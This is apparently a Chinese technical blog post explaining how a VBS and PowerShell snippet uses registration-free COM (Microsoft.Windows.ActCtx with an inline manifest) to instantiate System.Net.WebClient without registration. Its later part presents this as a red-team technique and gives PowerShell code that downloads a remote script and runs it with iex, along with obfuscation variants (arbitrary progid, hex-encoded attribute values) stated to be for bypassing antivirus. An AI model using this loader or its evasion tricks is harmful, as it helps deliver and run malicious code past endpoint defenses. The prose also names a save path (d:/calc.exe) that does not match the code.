vbs调用.net com组件中的一个疑点解释

很久前，网上就流传过一份vbs代码，可以调用System.Net.WebClient来下载文件。这份代码如下：

manifest = "<?xml version=""1.0"" encoding=""UTF-16"" standalone=""yes""?>"
manifest = manifest &"<assembly manifestVersion=""1.0"" xmlns=""urn:schemas-microsoft-com:asm.v1"">"
manifest = manifest &"<assemblyIdentity name=""System"" version=""4.0.0.0"" publicKeyToken=""B77A5C561934E089"" />"
manifest = manifest &"<clrClass clsid=""{7D458845-B4B8-30CB-B2AD-FC4960FCDF81}"" progid=""System.Net.WebClient"" threadingModel=""Both"" name=""System.Net.WebClient"" runtimeVersion=""v4.0.30319"" /></assembly>"
set ax = CreateObject("Microsoft.Windows.ActCtx")
ax.ManifestText = manifest
Set sNetClient = ax.CreateObject("System.Net.WebClient")
webstuff = sNetClient.DownloadFile("http://127.0.0.1/22.7z","g:/22.7z")
wsh.echo webstuff

这里的代码主要流程如下：

1、构建XML清单：

代码首先创建了一个XML清单字符串，定义了程序集的身份和所需的CLR类。这个清单指定了要使用的.NET Framework版本和System.Net.WebClient类。

2、创建激活上下文：

使用Microsoft.Windows.ActCtx创建一个激活上下文对象，并将XML清单设置为其ManifestText属性。

3、创建WebClient对象：

通过激活上下文创建System.Net.WebClient对象，这允许在没有安装.NET Framework的环境中使用.NET类。

4、下载文件：

使用WebClient对象的DownloadFile方法从指定URL下载文件，并将其保存到本地路径（d:/calc.exe）。

5、输出结果：

尝试输出下载操作的结果（虽然DownloadFile方法通常不返回值）。

最让人疑惑的就是mainifest变量中引入的xml清单，这份清单到底是什么？为什么要这么写。

其实这里引入免注册 COM 激活技术。传统上， COM 服务器 DLL 必须由 regsrv32.exe 注册，然后任何 COM 客户端才能与其交互。简而言之，regsrv32.exe 会向注册表添加一些键值对，以绑定和激活 COM 服务器。但是，与应用程序清单（嵌入或捆绑）配对的 COM 服务器 DLL 无需注册即可加载；因为清单中的信息足以绑定和激活 COM 服务器。

具体技术可以参考https://learn.microsoft.com/en-us/dotnet/framework/interop/configure-net-framework-based-com-components-for-reg和https://learn.microsoft.com/en-us/previous-versions/dotnet/articles/ms973915(v=msdn.10)。这都是2021年或更早的技术了。这两篇文章中微软提到用后缀.manifest保存这些清单，并用.rc文件配置（这里不提，你可以自己去读。）

现在我们来说一下，像publicKeyToken=""B77A5C561934E089""和clsid：7D458845-B4B8-30CB-B2AD-FC4960FCDF81等变量，这里能否更改。

clsid肯定是可以变的。因为用了免注册com组件，只要guid符合格式即可以，你可以随便改个字母和数字都可以。publicKeyToken是不可以变的。

在 Windows 10 中，%SystemRoot%WinSxS\Manifests 文件夹中就有中这些配置文件清单。不过用的是二进制增量压缩 （DCM.PA30 格式）进行压缩，而不是采用纯 XML 格式，我们可以用https://github.com/hfiref0x/SXSEXP来解压。

命令：SXSEXP < Source Directory > < Destination Directory >。我是解压了所有文件。

我们随便打开一个看一下：

是不是这样你就理解了manifest变量里的意思了？我们来搜索一下"System.Net"，powershell下：

Get-ChildItem D:\SXSEXP\*.manifest -Recurse | Select-String -pattern "System.Net"

打开这个搜索到的文件你就会理解了。

再来说一下程序的publicKeyToken，里边的值B77A5C561934E089，从哪里来的。

我们可以用powershell代码获得。我开始找的是System.Net.WebClient，获得值并不一样，替换vbs后也不成功。后来发现System.Net.WebClient是从system.dll里来的。我们直接获取一下：

[System.BitConverter]::ToString([System.Reflection.Assembly]::LoadFile("C:\Windows\WinSxS\msil_system_b77a5c561934e089_10.0.19200.884_none_f8dd488acbf7dfd7\System.dll").GetName().GetPublicKeyToken()) -replace '-'

这样的值就和程序里的对应上了。

这篇文章简单讲了一下无需注册的 COM 互操作的内部工作原理，并介绍了一种已知的技术，红队可以滥用该技术来动态加载 .NET 程序集逻辑。这项技术是由大名鼎鼎的 Casey Smith首次提出的。

我们还可以把上边的vbs代码改为powershell，并进行混淆以绕过杀软。

$obj = New-Object -COM Microsoft.Windows.ActCTX
$obj.ManifestText = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?><assembly manifestVersion="1.0" ><assemblyIdentity name="System" version="4.0.0.0" publicKeyToken="B77A5C561934E089" /><clrClass clsid="{7D458845-B4B8-30CB-B2AD-FC4960FCDF81}" progid="System.Net.WebClient" threadingModel="Both" name="System.Net.WebClient" runtimeVersion="v4.0.30319" /></assembly>'
$dummy = $obj.CreateObject('System.Net.WebClient')
$dummy.DownloadString("http://www.example.com") | iex

我们把“clrClass”中的“name”和“progid”的值设置为任意文字字符串。当我们调用 CreateObject 函数时，我们应该传递与“progid”属性匹配的字符串即可。其次，我们可以应用替代（十六进制）字符编码来屏蔽属性值。例如，ASCII 字符“{”的十六进制值为 0x7b，将表示为“{”。 PowerShell 代码可以做以下混淆：

$obj = New-Object -COM Microsoft.Windows.ActCTX
$obj.ManifestText = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?><assembly manifestVersion="1.0" ><assemblyIdentity name="System" version="4.0.0.0" publicKeyToken="B77A5C561934E089" /><clrClass clsid="{7D458845-B4B8-30CB-B2AD-FC4960FCDF81}" progid="abc" threadingModel="Both" name="something" runtimeVersion="v4.0.30319" /></assembly>'
$dummy = $obj.CreateObject('abc')
$dummy.DownloadString("http://www.example.com") | iex

具体参考：

https://inquest.net/blog/abusing-registration-free-com-interop/